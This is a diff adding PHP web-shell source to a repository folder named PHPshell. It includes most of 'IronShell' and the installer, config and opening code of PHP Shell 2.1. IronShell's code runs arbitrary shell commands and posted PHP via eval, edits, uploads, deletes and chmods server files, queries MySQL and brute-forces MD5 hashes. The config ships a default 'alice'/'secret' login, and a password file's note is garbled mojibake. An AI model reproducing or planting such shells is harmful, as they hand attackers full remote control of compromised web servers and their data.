||||||
|
#f:hover
|
||||||
|
{
|
||||||
|
background: #003000;
|
||||||
|
}
|
||||||
|
pre {
|
||||||
|
font-size: 10px;
|
||||||
|
font-family: verdana;
|
||||||
|
color: #33FF00;
|
||||||
|
}
|
||||||
|
a:hover {
|
||||||
|
text-decoration: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
input,textarea,select {
|
||||||
|
border-top-width: 1px;
|
||||||
|
font-weight: bold;
|
||||||
|
border-left-width: 1px;
|
||||||
|
font-size: 10px;
|
||||||
|
border-left-color: #33FF00;
|
||||||
|
background: #000000;
|
||||||
|
border-bottom-width: 1px;
|
||||||
|
border-bottom-color: #33FF00;
|
||||||
|
color: #33FF00;
|
||||||
|
border-top-color: #33FF00;
|
||||||
|
font-family: verdana;
|
||||||
|
border-right-width: 1px;
|
||||||
|
border-right-color: #33FF00;
|
||||||
|
}
|
||||||
|
|
||||||
|
hr {
|
||||||
|
color: #33FF00;
|
||||||
|
background-color: #33FF00;
|
||||||
|
height: 5px;
|
||||||
|
}
|
||||||
|
|
||||||
|
</style>
|
||||||
|
|
||||||
|
</head>
|
||||||
|
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
|
||||||
|
<table width=100%><td id="header" width=100%>
|
||||||
|
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';
|
||||||
|
|
||||||
|
foreach($pages as $page => $page_name)
|
||||||
|
{
|
||||||
|
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
|
||||||
|
|
||||||
|
}
|
||||||
|
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
|
||||||
|
print $header;
|
||||||
|
|
||||||
|
$footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
|
||||||
|
|
||||||
|
|
||||||
|
//
|
||||||
|
//Page handling
|
||||||
|
//
|
||||||
|
if(isset($_REQUEST['p']))
|
||||||
|
{
|
||||||
|
switch ($_REQUEST['p']) {
|
||||||
|
|
||||||
|
case 'cmd': //Run command
|
||||||
|
|
||||||
|
print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
|
||||||
|
if(isset($_REQUEST['command']))
|
||||||
|
{
|
||||||
|
print "<pre>";
|
||||||
|
execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case 'edit': //Edit a fie
|
||||||
|
if(isset($_POST['editform']))
|
||||||
|
{
|
||||||
|
$f = $_GET['file'];
|
||||||
|
$fh = fopen($f, 'w') or print "Error while opening file!";
|
||||||
|
fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
|
||||||
|
fclose($fh);
|
||||||
|
}
|
||||||
|
print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
|
||||||
|
|
||||||
|
if(file_exists($_GET['file']))
|
||||||
|
{
|
||||||
|
$rd = file($_GET['file']);
|
||||||
|
foreach($rd as $l)
|
||||||
|
{
|
||||||
|
print htmlspecialchars($l);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
print "</textarea><input type=submit value=\"Save\"></form>";
|
||||||
|
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 'delete': //Delete a file
|
||||||
|
|
||||||
|
if(isset($_POST['yes']))
|
||||||
|
{
|
||||||
|
if(unlink($_GET['file']))
|
||||||
|
{
|
||||||
|
print "File deleted successfully.";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Couldn't delete file.";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
|
||||||
|
{
|
||||||
|
print "Are you sure you want to delete ".$_GET['file']."?<br>
|
||||||
|
<form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
|
||||||
|
<input type=hidden name=yes value=yes>
|
||||||
|
<input type=submit value=\"Delete\">
|
||||||
|
";
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case 'eval': //Evaluate PHP code
|
||||||
|
|
||||||
|
print "<form action=\"".$me."?p=eval\" method=POST>
|
||||||
|
<textarea cols=60 rows=10 name=\"eval\">";
|
||||||
|
if(isset($_POST['eval']))
|
||||||
|
{
|
||||||
|
print htmlspecialchars($_POST['eval']);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "print \"Yo Momma\";";
|
||||||
|
}
|
||||||
|
print "</textarea><br>
|
||||||
|
<input type=submit value=\"Eval\">
|
||||||
|
</form>";
|
||||||
|
|
||||||
|
if(isset($_POST['eval']))
|
||||||
|
{
|
||||||
|
print "<h1>Output:</h1>";
|
||||||
|
print "<br>";
|
||||||
|
eval($_POST['eval']);
|
||||||
|
}
|
||||||
|
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 'chmod': //Chmod file
|
||||||
|
|
||||||
|
|
||||||
|
print "<h1>Under construction!</h1>";
|
||||||
|
if(isset($_POST['chmod']))
|
||||||
|
{
|
||||||
|
switch ($_POST['chvalue']){
|
||||||
|
case 777:
|
||||||
|
chmod($_POST['chmod'],0777);
|
||||||
|
break;
|
||||||
|
case 644:
|
||||||
|
chmod($_POST['chmod'],0644);
|
||||||
|
break;
|
||||||
|
case 755:
|
||||||
|
chmod($_POST['chmod'],0755);
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
|
||||||
|
}
|
||||||
|
if(isset($_GET['file']))
|
||||||
|
{
|
||||||
|
$content = urldecode($_GET['file']);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$content = "file/path/please";
|
||||||
|
}
|
||||||
|
|
||||||
|
print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
|
||||||
|
<input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
|
||||||
|
<select name=\"chvalue\">
|
||||||
|
<option value=\"777\">777</option>
|
||||||
|
<option value=\"644\">644</option>
|
||||||
|
<option value=\"755\">755</option>
|
||||||
|
</select><input type=submit value=\"Change\">";
|
||||||
|
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 'mysql': //MySQL Query
|
||||||
|
|
||||||
|
if(isset($_POST['host']))
|
||||||
|
{
|
||||||
|
$link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
|
||||||
|
mysql_select_db($_POST['dbase']);
|
||||||
|
$sql = $_POST['query'];
|
||||||
|
|
||||||
|
|
||||||
|
$result = mysql_query($sql);
|
||||||
|
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "
|
||||||
|
This only queries the database, doesn't return data!<br>
|
||||||
|
<form action=\"".$me."?p=mysql\" method=POST>
|
||||||
|
<b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
|
||||||
|
<b>Username:<br><input type=text name=username value=\"root\" size=10><br>
|
||||||
|
<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
|
||||||
|
<b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
|
||||||
|
|
||||||
|
<b>Query:<br></b<textarea name=query></textarea>
|
||||||
|
<input type=submit value=\"Query database\">
|
||||||
|
</form>
|
||||||
|
";
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 'createdir':
|
||||||
|
if(mkdir($_GET['crdir']))
|
||||||
|
{
|
||||||
|
print 'Directory created successfully.';
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print 'Couldn\'t create directory';
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case 'phpinfo': //PHP Info
|
||||||
|
phpinfo();
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case 'rename':
|
||||||
|
|
||||||
|
if(isset($_POST['fileold']))
|
||||||
|
{
|
||||||
|
if(rename($_POST['fileold'],$_POST['filenew']))
|
||||||
|
{
|
||||||
|
print "File renamed.";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Couldn't rename file.";
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
if(isset($_GET['file']))
|
||||||
|
{
|
||||||
|
$file = basename(htmlspecialchars($_GET['file']));
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$file = "";
|
||||||
|
}
|
||||||
|
|
||||||
|
print "Renaming ".$file." in folder ".realpath('.').".<br>
|
||||||
|
<form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
|
||||||
|
<b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
|
||||||
|
<b>To:<br><input type=text name=filenew value=\"\" size=10><br>
|
||||||
|
<input type=submit value=\"Rename file\">
|
||||||
|
</form>";
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 'md5':
|
||||||
|
if(isset($_POST['md5']))
|
||||||
|
{
|
||||||
|
if(!is_numeric($_POST['timelimit']))
|
||||||
|
{
|
||||||
|
$_POST['timelimit'] = 30;
|
||||||
|
}
|
||||||
|
set_time_limit($_POST['timelimit']);
|
||||||
|
if(strlen($_POST['md5']) == 32)
|
||||||
|
{
|
||||||
|
|
||||||
|
if($_POST['chars'] == "9999")
|
||||||
|
{
|
||||||
|
$i = 0;
|
||||||
|
while($_POST['md5'] != md5($i) && $i != 100000)
|
||||||
|
{
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i = "a"; $i != "zzzzz"; $i++)
|
||||||
|
{
|
||||||
|
if(md5($i == $_POST['md5']))
|
||||||
|
{
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if(md5($i) == $_POST['md5'])
|
||||||
|
{
|
||||||
|
print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
print "Will bruteforce the md5
|
||||||
|
<form action=\"".$me."?p=md5\" method=POST>
|
||||||
|
<b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
|
||||||
|
<b>Characters:</b><br><select name=\"chars\">
|
||||||
|
<option value=\"az\">a - zzzzz</option>
|
||||||
|
<option value=\"9999\">1 - 9999999</option>
|
||||||
|
</select>
|
||||||
|
<b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
|
||||||
|
<input type=submit value=\"Bruteforce md5\">
|
||||||
|
</form><br>*: if set_time_limit is allowed by php.ini";
|
||||||
|
break;
|
||||||
|
|
||||||
|
case 'headers':
|
||||||
|
foreach(getallheaders() as $header => $value)
|
||||||
|
{
|
||||||
|
print htmlspecialchars($header . ":" . $value)."<br>";
|
||||||
|
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
else //Default page that will be shown when the page isn't found or no page is selected.
|
||||||
|
{
|
||||||
|
|
||||||
|
$files = array();
|
||||||
|
$directories = array();
|
||||||
|
|
||||||
|
if(isset($_FILES['uploadedfile']['name']))
|
||||||
|
{
|
||||||
|
$target_path = realpath('.').'/';
|
||||||
|
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
|
||||||
|
|
||||||
|
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
|
||||||
|
print "File:". basename( $_FILES['uploadedfile']['name']).
|
||||||
|
" has been uploaded";
|
||||||
|
} else{
|
||||||
|
echo "File upload failed!";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
|
||||||
|
if ($handle = opendir('.'))
|
||||||
|
{
|
||||||
|
while (false !== ($file = readdir($handle)))
|
||||||
|
{
|
||||||
|
if(is_dir($file))
|
||||||
|
{
|
||||||
|
$directories[] = $file;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$files[] = $file;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
asort($directories);
|
||||||
|
asort($files);
|
||||||
|
foreach($directories as $file)
|
||||||
|
{
|
||||||
|
print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
|
||||||
|
}
|
||||||
|
|
||||||
|
foreach($files as $file)
|
||||||
|
{
|
||||||
|
print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
|
||||||
|
}
|
||||||
|
|
||||||
|
print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
|
||||||
|
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
|
||||||
|
<input type=\"submit\" value=\"Upload File\" />
|
||||||
|
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
|
||||||
|
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
|
||||||
|
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
|
||||||
|
</table>";
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function login()
|
||||||
|
{
|
||||||
|
print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
|
||||||
|
<form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
|
||||||
|
<input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
|
||||||
|
</form>";
|
||||||
|
}
|
||||||
|
function reload()
|
||||||
|
{
|
||||||
|
header("Location: ".basename(__FILE__));
|
||||||
|
}
|
||||||
|
|
||||||
|
function get_execution_method()
|
||||||
|
{
|
||||||
|
if(function_exists('passthru')){ $m = "passthru"; }
|
||||||
|
if(function_exists('exec')){ $m = "exec"; }
|
||||||
|
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
|
||||||
|
if(function_exists('system')){ $m = "system"; }
|
||||||
|
if(!isset($m)) //No method found :-|
|
||||||
|
{
|
||||||
|
$m = "Disabled";
|
||||||
|
}
|
||||||
|
return($m);
|
||||||
|
}
|
||||||
|
|
||||||
|
function execute_command($method,$command)
|
||||||
|
{
|
||||||
|
if($method == "passthru")
|
||||||
|
{
|
||||||
|
passthru($command);
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif($method == "exec")
|
||||||
|
{
|
||||||
|
exec($command,$result);
|
||||||
|
foreach($result as $output)
|
||||||
|
{
|
||||||
|
print $output."<br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif($method == "shell_exec")
|
||||||
|
{
|
||||||
|
print shell_exec($command);
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif($method == "system")
|
||||||
|
{
|
||||||
|
system($command);
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function perm($file)
|
||||||
|
{
|
||||||
|
if(file_exists($file))
|
||||||
|
{
|
||||||
|
return substr(sprintf('%o', fileperms($file)), -4);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
return "????";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function get_color($file)
|
||||||
|
{
|
||||||
|
if(is_writable($file)) { return "green";}
|
||||||
|
if(!is_writable($file) && is_readable($file)) { return "white";}
|
||||||
|
if(!is_writable($file) && !is_readable($file)) { return "red";}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function show_dirs($where)
|
||||||
|
{
|
||||||
|
if(ereg("^c:",realpath($where)))
|
||||||
|
{
|
||||||
|
$dirparts = explode('\\',realpath($where));
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$dirparts = explode('/',realpath($where));
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
$i = 0;
|
||||||
|
$total = "";
|
||||||
|
|
||||||
|
foreach($dirparts as $part)
|
||||||
|
{
|
||||||
|
$p = 0;
|
||||||
|
$pre = "";
|
||||||
|
while($p != $i)
|
||||||
|
{
|
||||||
|
$pre .= $dirparts[$p]."/";
|
||||||
|
$p++;
|
||||||
|
|
||||||
|
}
|
||||||
|
$total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
|
||||||
|
return "<h2>".$total."</h2><br>";
|
||||||
|
|
||||||
|
}
|
||||||
|
print $footer;
|
||||||
|
|
||||||
|
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
|
||||||
|
exit();
|
||||||
|
?>
|
||||||
5
php/PHPshell/【ironshell】/密码.txt
Normal file
5
php/PHPshell/【ironshell】/密码.txt
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
login
|
||||||
|
|
||||||
|
<EFBFBD><EFBFBD>ע:<3A><>ͬȨ<CDAC><C8A8><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>ò<EFBFBD>ͬ<EFBFBD><CDAC>ɫ<EFBFBD><C9AB><EFBFBD>ֳ<EFBFBD><D6B3><EFBFBD>
|
||||||
|
|
||||||
|
<20><>:777 750 730
|
||||||
96
php/PHPshell/【phpshell-2.1】/INSTALL
Normal file
96
php/PHPshell/【phpshell-2.1】/INSTALL
Normal file
@@ -0,0 +1,96 @@
|
|||||||
|
INSTALL file for PHP Shell 2.1
|
||||||
|
Copyright (C) 2000-2005 Martin Geisler <mgeisler@mgeisler.net>
|
||||||
|
Licensed under the GNU GPL. See the file COPYING for details.
|
||||||
|
|
||||||
|
|
||||||
|
Downloading PHP Shell
|
||||||
|
=====================
|
||||||
|
|
||||||
|
You can always get the latest version of PHP Shell from my homepage:
|
||||||
|
|
||||||
|
http://mgeisler.net/php-shell/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Installation
|
||||||
|
============
|
||||||
|
|
||||||
|
Installation is easy: first unpack the tarball or zipfile downloaded from the
|
||||||
|
above website into your webserver. This will create a subdirectory called
|
||||||
|
phpweather-2.1 for PHP Shell version 2.1.
|
||||||
|
|
||||||
|
Try loading the file ``phpshell.php`` in your browser and check that you are
|
||||||
|
served a page that asks you to authenticate yourself with a username and a
|
||||||
|
password. If you do not see such a page, then please check that you have
|
||||||
|
entered the URL correctly and that PHP is working on your server.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Configuration
|
||||||
|
=============
|
||||||
|
|
||||||
|
All configuration happens in the ``config.php`` file. This is an ini-file
|
||||||
|
dispite its name. Ini-files consist of a number of sections, each containing
|
||||||
|
a number of 'key = "value"' pairs. PHP Shell has tree sections: '[users]' for
|
||||||
|
configuring usernames and passwords, '[aliases]' for configuring shell
|
||||||
|
aliases, and '[settings]' for general settings.
|
||||||
|
|
||||||
|
|
||||||
|
Setting Usernames and Passwords
|
||||||
|
-------------------------------
|
||||||
|
|
||||||
|
As a security precaution PHP Shell has no default username and password
|
||||||
|
(people often forget to change them...). To add the user "alice" with
|
||||||
|
password "secret" you simply add
|
||||||
|
|
||||||
|
[users]
|
||||||
|
alice = "secret"
|
||||||
|
|
||||||
|
to the file. Note that you can add as many users as you want by simply adding
|
||||||
|
more lines like this.
|
||||||
|
|
||||||
|
This system works, but there is a better way --- a way so that the password
|
||||||
|
does not appear in clear text in the file. For that you use the supplied
|
||||||
|
script ``pwhash.php`` to generate a hashed password. Please see the
|
||||||
|
instructions given in ``pwhash.php``.
|
||||||
|
|
||||||
|
With the above example the result could look like
|
||||||
|
|
||||||
|
[users]
|
||||||
|
alice = "md5:7ea3b59e:eb271c4459253eaa163fcac2a119f225"
|
||||||
|
|
||||||
|
You will not get exactly the same line if you try it out, this is a feature of
|
||||||
|
the system which means that both "alice" and "bob" could have "secret" as
|
||||||
|
their password, and you would not be able to tell from just looking at
|
||||||
|
``config.php``.
|
||||||
|
|
||||||
|
|
||||||
|
Shell Aliases
|
||||||
|
-------------
|
||||||
|
|
||||||
|
As in a normal shell, PHP Shell supports alias expansion, albeit in a simple
|
||||||
|
form. Aliases are defined by 'key = "value"' pairs in the '[aliases]'
|
||||||
|
section. The "key" will be matched against the first token of the command
|
||||||
|
line and substituted with the "value" given.
|
||||||
|
|
||||||
|
Two convenient aliases are already defined:
|
||||||
|
|
||||||
|
[aliases]
|
||||||
|
ls = "ls -CvhF"
|
||||||
|
ll = "ls -lvhF"
|
||||||
|
|
||||||
|
|
||||||
|
General Settings
|
||||||
|
----------------
|
||||||
|
|
||||||
|
PHP has just one other setting right now --- the home directory. Change this
|
||||||
|
in the '[settings]' section.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Bugs? Comments?
|
||||||
|
================
|
||||||
|
|
||||||
|
If you find a bug or miss something in PHP Shell, please don't hesitate to
|
||||||
|
mail me at <mgeisler@mgeisler.net>! Or you could drop by and leave a comment
|
||||||
|
at http://mgeisler.net/php-shell/.
|
||||||
54
php/PHPshell/【phpshell-2.1】/config.php
Normal file
54
php/PHPshell/【phpshell-2.1】/config.php
Normal file
@@ -0,0 +1,54 @@
|
|||||||
|
; <?php die('Forbidden'); ?>
|
||||||
|
; Do not remove the above line, it prevents this file from being downloaded.
|
||||||
|
;
|
||||||
|
; config.php file for PHP Shell 2.1
|
||||||
|
; Copyright (C) 2005 Martin Geisler <mgeisler@mgeisler.net>
|
||||||
|
; Licensed under the GNU GPL. See the file COPYING for details.
|
||||||
|
|
||||||
|
; This ini-file has three parts:
|
||||||
|
;
|
||||||
|
; * [users] where you add usernames and passwords to give users access to PHP
|
||||||
|
; Shell.
|
||||||
|
;
|
||||||
|
; * [aliases] where you can configure shell aliases.
|
||||||
|
;
|
||||||
|
; * [settings] where general settings are placed.
|
||||||
|
|
||||||
|
|
||||||
|
[users]
|
||||||
|
|
||||||
|
; The default configuration has no users defined, you have to add your own
|
||||||
|
; (choose good passwords!). Add uses as simple 'username = "password"' lines.
|
||||||
|
; Please quote your password using double-quotes as shown. The semi-colon ':'
|
||||||
|
; is a reserved character, so do *not* use that in your passwords.
|
||||||
|
;
|
||||||
|
; For improved security it is *strongly suggested* that you the pwhash.php
|
||||||
|
; script to generate a hashed password and store that instead of the normal
|
||||||
|
; clear text password. Keeping your passwords in hashed form ensures that
|
||||||
|
; they cannot be found, even if this file is disclosed. The passwords are
|
||||||
|
; still visible in clear text during the login, though. Please follow the
|
||||||
|
; instructions given in pwhash.php.
|
||||||
|
|
||||||
|
alice = "secret"
|
||||||
|
|
||||||
|
[aliases]
|
||||||
|
|
||||||
|
; Alias expansion. Change the two examples as needed and add your own
|
||||||
|
; favorites --- feel free to suggest more defaults! The command line you
|
||||||
|
; enter will only be expanded on the very first token and only once, so having
|
||||||
|
; 'ls' expand into 'ls -CvhF' does not cause an infinite recursion.
|
||||||
|
|
||||||
|
ls = "ls -CvhF"
|
||||||
|
ll = "ls -lvhF"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[settings]
|
||||||
|
|
||||||
|
; General settings for PHP Shell.
|
||||||
|
|
||||||
|
; Home directory. PHP Shell will change to this directory upon startup and
|
||||||
|
; whenever a bare 'cd' command is given. This can be an absolute path or a
|
||||||
|
; path relative to the PHP Shell installation directory.
|
||||||
|
|
||||||
|
home-directory = "."
|
||||||
BIN
php/PHPshell/【phpshell-2.1】/phpshell3.jpg
Normal file
BIN
php/PHPshell/【phpshell-2.1】/phpshell3.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 31 KiB |
408
php/PHPshell/【phpshell-2.1】/phpshell3.php
Normal file
408
php/PHPshell/【phpshell-2.1】/phpshell3.php
Normal file
@@ -0,0 +1,408 @@
|
|||||||
|
<?php // -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
/*
|
||||||
|
|
||||||
|
**************************************************************
|
||||||
|
* PHP Shell 2.1 *
|
||||||
|
**************************************************************
|
||||||
|
|
||||||
|
PHP Shell is an interactive PHP script that will execute any command
|
||||||
|
entered. See the files README, INSTALL, and SECURITY or
|
||||||
|
http://mgeisler.net/php-shell/ for further information.
|
||||||
|
|
||||||
|
Copyright (C) 2000-2005 Martin Geisler <mgeisler@mgeisler.net>
|
||||||
|
|
||||||
|
This program is free software; you can redistribute it and/or
|
||||||
|
modify it under the terms of the GNU General Public License
|
||||||
|
as published by the Free Software Foundation; either version 2
|
||||||
|
of the License, or (at your option) any later version.
|
||||||
|
|
||||||
|
This program is distributed in the hope that it will be useful,
|
||||||
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
GNU General Public License for more details.
|
||||||
|
|
||||||
|
You can get a copy of the GNU General Public License from this
|
||||||
|
address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
|
||||||
|
*/
|
||||||
|
|
||||||
|
/* There are no user-configurable settings in this file anymore, please see
|
||||||
|
* config.php instead. */
|
||||||
|
|
||||||
|
|
||||||
|
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||||
|
* errors, unless they have been suppressed with the @-operator. */
|
||||||
|
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||||
|
/* The @-opertor (used with chdir() below) temporarely makes
|
||||||
|
* error_reporting() return zero, and we don't want to die in that case.
|
||||||
|
* We do note the error in the output, though. */
|
||||||
|
if (error_reporting() == 0) {
|
||||||
|
$_SESSION['output'] .= $errstr . "\n";
|
||||||
|
} else {
|
||||||
|
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>PHP Shell 2.1</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Fatal Error!</h1>
|
||||||
|
<p><b>' . $errstr . '</b></p>
|
||||||
|
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
|
||||||
|
<p>Please consult the <a href="README">README</a>, <a
|
||||||
|
href="INSTALL">INSTALL</a>, and <a href="SECURITY">SECURITY</a> files for
|
||||||
|
instruction on how to use PHP Shell.</p>
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
|
||||||
|
<address>
|
||||||
|
Copyright © 2000–2005, <a
|
||||||
|
href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the latest
|
||||||
|
version at <a
|
||||||
|
href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Installing our error handler makes PHP die on even the slightest problem.
|
||||||
|
* This is what we want in a security critical application like this. */
|
||||||
|
set_error_handler('error_handler');
|
||||||
|
|
||||||
|
|
||||||
|
function logout() {
|
||||||
|
/* Empty the session data, except for the 'authenticated' entry which the
|
||||||
|
* rest of the code needs to be able to check. */
|
||||||
|
$_SESSION = array('authenticated' => false);
|
||||||
|
|
||||||
|
/* Unset the client's cookie, if it has one. */
|
||||||
|
// if (isset($_COOKIE[session_name()]))
|
||||||
|
// setcookie(session_name(), '', time()-42000, '/');
|
||||||
|
|
||||||
|
